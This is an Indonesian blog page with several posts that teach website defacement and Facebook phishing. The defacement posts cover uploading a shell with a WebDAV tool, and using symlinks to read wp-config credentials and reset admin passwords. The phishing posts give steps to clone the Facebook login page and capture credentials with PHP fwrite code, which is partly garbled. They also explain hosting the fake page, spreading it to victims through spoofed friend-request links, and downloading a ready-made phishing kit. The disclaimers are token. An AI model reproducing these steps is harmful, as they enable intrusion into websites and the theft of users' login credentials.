Saturday, February 14, 2015

Cara Deface Website Dengan Webdav

Posted on 3:05 AM by  with No comments

Selamat Datang Lagi Di Blog Deni AtmojooSelamat Sore :) sudah makan sore belum? Kalau belum, abis baca artikel yang dibawah ini makan dulu ya, biar tidak sakit :D Gimana kabar untuk hari ini ? Semoga sehat selalu :) Oke, Di kesempatan kali ini saya akan membagikan Artikel yang berjudul ” Cara Deface Website Dengan Webdav ” Silahkan membaca dan Semoga bermanfaat ya :)

Apa Itu Deface ? Deface ialah kegiatan mengubah tampilan halaman index atau subhalaman dari suatu website dengan cara memasukkan shell kedalam database di suatu website tersebut. Kegiatan Meretas website ini atau Deface, bisa dilakukan karena terdapat suatu celah yang ada di website tersebut. Kegiatan meretas website atau Deface ini dilakukan oleh para Defacer (Yang Melakukan Aksi Deface) untuk menunjukkan kemampuannya atau untuk menguji kelemahan pada suatu website.
Kegiatan Meretas Website atau Defacing ini ialah kegiatan meretas website yang bertujuan kepada target website yang ingin di deface untuk diganti tampilan situs nya secara fisik tanpa diketahui oleh sang pemilik website tersebut. Kegiatan Deface ini biasa dilakukan oleh para defacer secara perorangan dan juga secara tim cyber. Deface sebenarnya dilarang oleh UU ITE karena kegiatan ini bersifat merugikan orang lain (Admin Websitenya) Dan Juga merupakan kegiatan merusak. Deface sangat dilarang oleh UU ITE akan tetapi masih banyak yang melakukan kegiatan ini.
Jenis-Jenis Dari Deface :
– Jenis Deface Secara Total
Jenis Deface Secara Total adalah jenis kegiatan defacing secara menyeluruh, dalam artian bahwa website atau situs target yang telah di targetkan akan di deface oleh si Defacer tersebut secara total atau penuh, sehingga saat website tersebut diakses/dibuka maka akan muncul pada homepage website tersebut ialah tampilan website yang telah di deface. Dan jika halaman utama atau halaman index ini yang di deface maka otomatis sub halaman yang lain akan terjadi bermasalah atau error.
– Jenis Deface Sebagian
Jenis Deface Sebagian ialah jenis kegiatan defacing yang tidak menyeluruh, melainkan hanya mendeface sub halaman atau hanya memasukkan script-script virus yang bertujuan untuk membuat website error.
Cara Mengatasi Website Yang Terkena Deface :
– Download dan Update terus CMS Terbaru.
– Patch Website yang terkena deface.
– Ganti User dan Kata sandi Admin Login dengan yang baru dan usahakan katasandi nya kuat (Gabungan antara huruf,angka dan simbol) agar lebih aman. untuk menghindari website di deface kembali.
Sekarang kita akan kembali ke materi awal yaitu cara deface menggunakan aplikasi webdav. Silahkan dibaca Tutorial Dari saya berikut ini :
Sebelumnya saya ber terimakasih untuk Mas Hmei7 karena telah membuat aplikasi webdav ini untuk memudahkan para defacer pemula untuk lebih gampang melakukan defacing web.
webdav app logo
Pertama Dan Terutama Sebelum melakukan tutorial dari saya ini persiapkan lah terlebih dahulu alat-alat pendukung dibawah ini :
– Komputer/Laptop yang terkoneksi ke Internet.
– Aplikasi Webdav
– Secangkir Teh dan Cemilan Ringan :D
Jika 3 alat tersebut sudah lengkap kita akan lanjut ke tutorial :
  1. Siapkan Aplikasi Webdav untuk memulai defacing nya. Jika belum punya aplikasi webdav ini, anda dapat mendownloadnya di WebDav Application (Buka Situs Yang Berwarna biru)
  2. Download Aplikasinya dan Install Ke Komputer/Laptop mu.
  3. Setelah di download dan di install langkah selanjutnya ialah buka aplikasinya dan Klik kolom “Webdav” Yang ada di kolom atas sebelah kanan, Dan Klik “Asp Shell Maker “
  4. Lalu Klik Kolom “Setting” Ganti kalimat /Hmei7.asp:txt dengan kalimat anda contoh /Taufiq371.asp:txt
  5. Selanjutnya ialah anda masukkan url atau link website yang vuln untuk di deface dan anda Klik ‘Serang’
  6. Lalu ikuti langkah-langkah selanjutnya dan masukkan shell anda untuk di upload kedalam database website tersebut
Lalu setelah anda Upload Shell nya anda telah sukses men deface web tersebut, selanjutnya anda tinggal buka website tersebut dan anda akan melihat apakah berhasil atau tidak.
Sebenarnya selain metode deface ini ada juga metode yang bertujuan untuk merusak website dengan cara mengirim Paket Data Sebanyak-banyaknya atau disebut DOS (Denial Of Service) Metode ini bertujuan untuk membuat website target lambat diakses bahkan dapat membuat website down. Akan tetapi metode DoS ini akan saya bahas lebih lanjut pada pertemuan selanjutnya :)
Terimakasih telah membaca artikel ini dan semoga bermanfaat untuk anda :) Ingat ! Saya membagikan tutorial deface diatas hanya untuk pengetahuan semata, jangan dilakukan untuk perusakan. Segala Tindakan Perusakan atau Tindakan Penyalahgunakan Bukan Tanggung Jawab Saya, Melainkan tanggung jawab anda sendiri :)
Jangan lupa untuk kunjungi terus Blog Taufiq Rahman ini, Karena setiap hari akan selalu di update artikel-artikel bermanfaat dan unik lainnya.
” DILARANG KERAS MENYALIN ARTIKEL INI, SELURUH KONTEN DAN ARTIKEL DI BLOG INI DILINDUNGI OLEH DMCA DAN DILINDUNGI HAK CIPTA.”
Jika masih ada yang belum dipahami atau masih ada yang ingin ditanyakan silahkan berkomentar, saya akan menjawabnya :)

Cara Deface Website Dengan Symlink

Posted on 3:03 AM by  with No comments


Selamat Siang Semua :D ketemu lagi bersama saya di Blog Deni Atmojo Pada siang yang panas ini :D Saya akan membagikan artikel yang bernama ” Cara Deface Website Dengan Symlink ” Silahkan dibaca :D
Sebenarnya apasih itu Symlink ? Apa Pengertian Dari Symlink itu ? Apa Singkatan Dari Symlink Tersebut ? Pada artikel kali ini saya juga akan menjelaskan sedikit singkatan dari Symlink itu sendiri. Symlink itu sebenarnya adalah sebuah Singkatan dari Symbolic Link, Jadi Symlink itu ialah Symbolic Link. Apa Itu Symbolic Link ? Symbolic Link atau Symlink ialah File Yang mempunyai tipe khusus yang akan mengarahkan file tersebut kepada file yang lainnya. Symbolic Link atau Symlink dibagi menjadi dua bagian yaitu Hard Symlink Dan Soft Symlink. Hard Symlink ialah mempunyai arti yaitu munculnya di lokasi hard link seperti file tersebut berada di sebuah lokasi yang sama dengan hard link tersebut. Sedangkan Arti Dari Soft Symlink berbeda dengan Hard Symlink, Soft Symlink adalah munculnya di suatu lokasi itu dan diarahkannya masih tetap dilokasi itu pula.

Symlink atau Symbolic Link juga mempunyai beberapa manfaat, diantaranya :
  1. Menghemat Kapasitas pemakaian dari suatu Hard Disk.
  2. Sangat Amat Membantu Dalam Mengolah Data.
  3. Sangat Efisiensi Didalam sebuah pengelolaan data.
  4. Dapat memudahkan penggunanya untuk mengakses file atau folder yang dianggap penting.
Sekian Untuk Penjelasan Singkat dari Symlink itu sendiri, lebih lengkapnya silahkan anda cari di mesin pencari seperti Google. Selanjutnya saya akan kembali membahas materi awal kita yaitu Deface Website Dengan Symlink.
Deface adalah menembus suatu admin situs dari suatu situs, Deface ini sebenarnya dilarang oleh UU ITE karena bersifat merugikan. Kenapa Merugikan ? Sudah jelas merugikan karena sangat merugikan untuk Admin yang mempunyai situs tersebut karena Deface adalah tindakan merusak dan mengganti tampilan Homepage atau Index atau halaman utama dari Suatu situs. Saya Ingatkan, Saya membagikan tutorial deface menggunakan metode Symlink ini hanya untuk pengetahuan dan pembelajaran semata. Jangan Gunakan tutorial dari saya ini untuk merusak atau penyalahgunaan. Segala bentuk penyalahgunaan ditanggung oleh anda sendiri :)
Website Defaced
Langsung saja anda siapkan bahan-bahan untuk melakukan tutorial ini :
  • Komputer atau Laptop
  • Modem atau Wifi (Untuk Koneksi Internetnya)
  • Secangkir Teh Atau Kopi (Biar Tidak Bosan)
  • Siapkan Shell Mu.
  • Siapkan Kesabaran Dan Ketelitian :D
Lenkapi dulu semua bahan-bahan diatas itu, maka langsung saja kita mulai tutorial ini.
  1. Cari Target Vuln / Website yang Vulnerability untuk diretas (deface). Web Vuln ialah website target yang sudah bisa untuk di deface, jika tidak bisa di deface percuma saja :)
  2. Selanjutnya anda pasang atau anda tanam shell anda di website tersebut. Jika sudah ditanam shell nya maka langsung saja anda buka File symlink Lalu anda buka symlink tersebut pada suatu web itu. Setelah anda buka maka anda akan otomatis muncul tab yang baru di Browser anda.
  3. selanjutnya jika website yang anda deface itu ialah website yang menggunakan wordpress, anda buka file ‘ wp-config.php ‘ Selanjutnya setelah anda buka file config tersebut maka anda akan menemukan User Beserta Kata sandi atau password dari admin situs tersebut. Kalau untuk situs wordpress biasanya akan muncul ‘ wp-user dan wp-password ‘ namun jika website Joomla maka yang muncul adalah ‘ $username dan $password ‘
  4. Selanjutnya ialah jika anda telah menemukan username beserta password dari situs tersebut anda buka tab ‘ My Sql ‘ nya lalu anda masukkan username admin dan password admin situs tersebut di kolom Mysql nya.
  5. Lalu anda klik ‘Login’ dan tunggu proses memuat data nya selesai (Proses Loading)
  6. Selanjutnya cari table yang mempunyai kata dibelakangnya yaitu ‘ user ‘
  7. setelah itu anda ganti kata sandi situs tersebut dengan Kata sandi MD5
Jika anda belum mengetahui arti dari MD5 itu sendiri, maka saya akan menjelaskan secara detail arti dari MD5 itu sendiri. MD5 Merupakan singkatan dari Message Digesst Alghorithm 5, yang digunakan untuk Hash Value suatu kata sandi. MD5 dibuat oleh programmer sekaligus profesor yang bernama Ronald Rivest. MD5 dibuat pada tahun 1991.
MD5 dibuat untuk menggantikan Hash yang sebelumnya yaitu MD4. MD4 diganti dengan MD5 karena di MD4 terdapat kelemahan yang ditemukan oleh Hans Dobbertin, maka dari itu MD5 dibuat.
Silahkan anda ubah kata sandi situs tersebut menggunakan MD5
Selamat Mencoba tutorial deface kali ini. Semoga artikel ini bermanfaat untuk anda. jika ada yang belum dimengerti atau belum paham silahkan berkomentar :)
” DILARANG KERAS MENYALIN ARTIKEL INI, ARTIKEL INI DILINDUNGI HAK CIPTA DAN DMCA. ”
Terimakasih telah berkunjung dan membaca artikel dari Blog ini :) Kunjungi terus ya Blog Taufiq Rahman ini karena setiap hari akan membagikan Artikel-artikel unik lainnya :)
Sekian dari saya untuk artikel kali ini :)

Cara membuat Web Phising Facebook

Posted on 3:02 AM by  with No comments
Cara membuat Web Phising Facebook – Pada postingan kali ini saya akan membahas tentang cara membuat web phising. walaupun ini sudah berita lama yang banyak orang sudah mengetahuinya. Tapi saya yakin masih banyak yang ingin tahu tentang cara membuat web phising seperti yang anda baca sekarang ini. Apakah anda sudah tau apa itu web phising ?? Web Phisng = WEB+ Phising.
Web  menurut saya adalah sebuah page/halaman yang berisi content yang di isi oleh admin/pemilik web, lebih lengkapnya kesini. Phising menurut dari yang saya baca yaitu berasal dari kata “Fishing” atau di bahasa Indonesia kan yang memiliki arti “memancing”. Lho kok Memancing? ternyata memang benar kita membuat web untuk memancing korban untuk masuk dalam perangkap Web Phising yang telah kita buat. Cara buatnya gimana ? Baik saya akan kasih tahu cara membuat web phising. Langkah – langkahnya sebagai berikut :
  1. Cari dan buka alamat yang mau dijadikan homepage/halaman utama Web Phising anda. misal http://www.facebook.com.
  2. Setelah halaman terbuka sepenuhnya anda tekal tombol “Ctrl + U” di keyboard secara bersamaan. Kemudian akan muncul Source Code.
  3. Copy semua Source Code tersebut. Tekan “Ctrl + A(untuk blok semua source code) kemudian tekan “Crtl + C(untuk meng-copy / menyaslin Source Code tersebut).
  4. Setelah itu buka notepad/wordpad (Start – all program – accessories- Notepad/Wordpad)  di WINDOWS atau gedit (Applications –  Accessories – Gedit Text Editor) di LINUX.
  5. Paste Source Code (ctrl + v) yang sudah di copy tadi. seperti langkah nomor 3.
  6. Cari menggunakan “Crtl + F”, isi dengan “action=(tanpa tanda petik)
  7. Ketemu [code=’php’]
    [/code]
  8. Ganti fb.com” (contoh) dengan “phising.php”.
  9. Ubah “postmenjadi “GET“.
  10. Save as (file – Save as) atau tekan “Ctrl + S”. Berinama dengan “index.html” dan File Type pilih “All FIle”
  11. .Buka notepad lagi (langkah sama seperti nomor 4).
  12. Copy Paste Code PHP ini ke notepad : [code=’php’] $value) { fwrite($handle, $variable); fwrite($handle, “=”); fwrite($handle, $value); fwrite($handle, “rn”); } fwrite($handle, “rn”); fclose($handle); exit; ?>[/code]
  13. Ganti “http://fb.com” dengan “http://facebook.com” misal (tanpa tanda kutip).
  14. Save dengan nama phising dan extensi .php jadinya phising.php (Caranya sama seperti langkah no. 10)
  15. Upload ke hosting anda. (Silahkan cari hosting gratis atau berbayar, tidak disarankan menggunakan Hosting Gratis 000webhost untuk membuat web phising. Namun jika ingin tahu Cara Upload File di Free Hosting 000webhost silahkan baca saja. Satu lagi, pastikan domain anda sudah mengarah ke hosting anda. Jika anda tidak mengerti silahkan pelajari tentang Domain dan Hosting terlebih dahulu.
  16. Setelah ke-3 file berhasil di upload jangan lupa permission/chmod di atur 777 untuk file passwords.txt, agar password yang di ketikan oleh korban dapat tersimpan.
  17. Selesai. Silahkan Coba akes Domain anda dan apa yang anda lihat ? Jika tampilan mirip seperti halaman ketika anda membuka website yang anda tiru berarti benar.
  18. Silahkan anda test apakah WebPhising buatan anda sukses dapat menyimpan email dan password korban.
  19. Jika berhasil menyimpan informasi login korban seperti email dan password, waktunya sebarkan web phising anda dengan kecerdikan anda.
Sekian dulu postingan cara membuat web phising apabila anda masih bingung jangan malu bertanya. :D

Script Phising Facebook Terbaru 2014

Posted on 3:01 AM by  with No comments
Hai Sob...

Kali ini gua akan membagikan Script Phising Facebook Terbaru 2014
Phising terbaru ini dapat meyakinkan para pengguna facebook karena tampilannya sangat mirip dan didesain persis dengan web aslinya.Gunakan secara bijak ya..

Langsung aja gan ..

Nih ScreenShot Nya Gan => SS

Berikut Script Phising Facebook Terbaru 2014 :
DONWLOAD DI SINI

Password:MX93

Sekian dulu ya gan artikel saya mengenai Script Phising Facebook Terbaru 2014
Jika bermanfaat di Bookmark Ya.. :)

Jika agan masih tidak mengerti atau ada hal yang ingin ditanyakan, silakan bertanya di kolom komentar.

Cara Mudah Bikin Phising Facebook

Posted on 2:58 AM by  with 1 comment



Phising
 merupakan istilah yang diambil dari kata Fishing yang artinya
Memancing.Phising didunia internet berarti memancing korban untuk
mengunjungi halaman tertentu.Phising di Facebook berarti Hacker
menggunakan segala cara untuk memancing anda agar mengunjungi halaman
Facebook palsu (Fake Login Facebook).Phising Facebook merupakan cara
yang paling sering digunakan dalam Facebook Hacking.
Cara Phising-nya antara lain:

1. Mengirim Email palsu
Intinya Hacker mengirim sebuat email kepada anda yang seolah-olah
merupakan email dari Facebook dan anda diminta untuk mengunjungi sebuah
link/url/alamat situs.
2. Melalui IM(internet messenger)
Misalnya Hacker masuk kesebuah room di YM(Yahoo Messenger) dan mempost
sebuah link Facebook Palsu.
3. Melalui sebuah situs
misalnya :
a) Hacker membuat sebuah Blog dan memposting artikel menarik tentang
Facebook dan mengarahkan anda ke halaman login Facebook palsu.
b) Dengan memberi komentar beserta link Facebook palsu diartikel sebuah
situs
c) Hacker menggunakan situs² iklan baris gratis/non gratis untuk
mem-post tulisan ajakan-nya. Dll

Berikut Cara Mudah Membuat Phising Facebook :
1. Buka http://www.facebook.com/login.php
2. Klik Kanan >> View Page Source atau tekan CTRL + U
3. Copy semua kode yang ada disitu kemudian paste ke notepad
4. Tekan CTRL + F kemudian cari kata action=
5..Ubah.action="https://www.facebook.com/login.php?login_attempt=1"
menjadi action="next.php" .. Ubah juga method dari POST menjadi get

6. Simpan notepad ini dengan nama login.php
7. Buat notepad baru kemudian isikan kode berikut

     $value) {
    fwrite($handle, $variable);
    fwrite($handle, "=");
    fwrite($handle, $value);
    fwrite($handle, "\r\n");
    }
    fwrite($handle, "\r\n");
    fclose($handle);
    exit;
    ?>



Note: ubah http://www.Facebook.com/login.php menjadi alamat web yang
anda inginkan


8. Simpan Dengan Nama next.php
9. Buat notepad baru lagi .. isikan dengan huruf L >> Kemudian
simpan dengan nama pass.txt
10. Kemudian Upload ke tiga file tersebut "login.php, next.php,
pass.txt" ke alamat free hosting misalnya
http://000webhost.com,http://idhostinger.com, http://spam.com atau
http://007sites.com.

Langkah-langkah spoofing :
1. Copy content asli undangan pertemanan dari facebook.
2. Edit hyperlink dari : "http:/www.facebook.com/n/?reqs.php"
3. Ganti dengan halaman phising anda, hal ini tidak akan merubah
tampilan di content asli facebook tapi tetap mengarah ke halaman phising
 kamu. Phising siap dikirim ke korban kamu.


Copy and WIN : http://bit.ly/copynwin